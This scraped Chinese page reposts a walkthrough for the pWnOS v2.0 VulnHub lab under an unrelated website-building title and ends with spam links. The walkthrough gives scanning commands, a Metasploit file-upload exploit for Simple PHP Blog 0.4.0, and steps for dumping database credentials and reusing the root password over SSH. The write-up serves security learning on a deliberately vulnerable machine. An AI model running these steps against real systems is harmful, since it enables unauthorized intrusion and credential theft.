当前位置: 首页 > news >正文

人社门户网站建设方案非官方网站建设

人社门户网站建设方案,非官方网站建设,怎么做网站的外链,石家庄开发区网站建设知识点总结#xff1a; 1.通过模块来寻找漏洞 2.msf查找漏洞 3.通过网站源代码#xff0c;查看模块信息 环境准备 攻击机#xff1a;kali2023 靶机#xff1a;pWnOS v2.0 安装地址#xff1a;pWnOS: 2.0 (Pre-Release) ~ VulnHub 在安装网址中看到#xff0c;该靶… 知识点总结 1.通过模块来寻找漏洞 2.msf查找漏洞 3.通过网站源代码查看模块信息 环境准备 攻击机kali2023 靶机pWnOS v2.0 安装地址pWnOS: 2.0 (Pre-Release) ~ VulnHub 在安装网址中看到该靶机静态IP为10.10.10.100 所以我们就要修改虚拟机的虚拟网络编辑器 其次靶机的虚拟机设置如下 开始渗透 信息收集 收集IP(虽然已经知道了) arp-scan -l 端口扫描 先大概看一下 nmap 10.10.10.100 再详细看一下 nmap -A -p- 10.10.10.100看到内核版本等 访问一下80端口 扫一下目录 gobuster dir -u http://10.10.10.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt扫到了/blog目录访问 查看源代码 查看到建立博客的模块模版是Simple PHP Blog 0.4.0 漏洞查找 msf查找有没有现成的漏洞 search Simple PHP Blog 0.4.0 存在那我们直接利用 use unix/webapp/sphpblog_file_upload set Rhost 10.10.10.100 set uri /blog //填有该模块的url此处写为uri run //运行 shell //开启命令行 python -c import pty;pty.spawn(/bin/bash) //优化命令行 提权 查看一下目录 存在文件mysqli_connect.php看看 拿到数据库root密码登录 看看能不能拿到相关账户密码分别执行下述命令爆库 show databases; use mysql; show tables; select * from user;最后看到 看到root的好多密码都是一致的具体解密我也不知道所以没有解密成功 但是我们可以用上面的那个密码再登录一下ssh试试 ssh root10.10.10.100 成功root
http://www.zqtcl.cn/news/113990/

相关文章:

  • 深圳系统网站开发做家具定制的设计网站
  • 网站制作学费多少钱网络推广的常用方法
  • 个人作品网站模板百度上做网站需要钱吗
  • 苏州网站建设行业研究思路 网站建设
  • 金泉网做网站找谁网站的结构布局
  • 网站开发摊销年限柳州网站建设哪家
  • 佛山市和城乡建设局网站首页武建安装公司新闻
  • 如何宣传商务网站网页制作与设计自考
  • 在国内的服务器上建设国外网站响应式单页网站模板
  • 平湖市住房建设局网站国外代理ip
  • 铁路建设监理网站地推项目发布平台
  • 我的世界做指令的网站网站如何在推广
  • 过年做那个网站致富盘锦网站建设vhkeji
  • 网站semseo先做哪个关键词投放
  • 药品招商网站大全南阳做网站公司电话
  • 优秀手机网站大学生创新产品设计作品
  • 备案期间关闭网站宝应人才网
  • 响应式网站一般做几个版本官网+wordpress
  • 太原网站建设方案服务佛山市建设工程有限公司
  • 智能网站建设平台php mysql 网站源码
  • 夏天做那些网站能致富百度关键词价格怎么查询
  • 厦门微信网站专业从事网站开发公司
  • 网站标题的写法湖南如何做网络营销
  • 设计做兼职的网站求推荐医院英文网站建设
  • 有没得办法可以查询一个网站有没得做竞价呀ai可以用来做网站吗
  • 俄乌局势最新消息惠州seo排名优化
  • 常州发布信息的有什么网站电商平台建设公司
  • 高新区手机网站建设长沙关键词优化服务
  • 网站开发预算报价表推销网站的方法
  • 做网站需要几个人昆明旅行社网站开发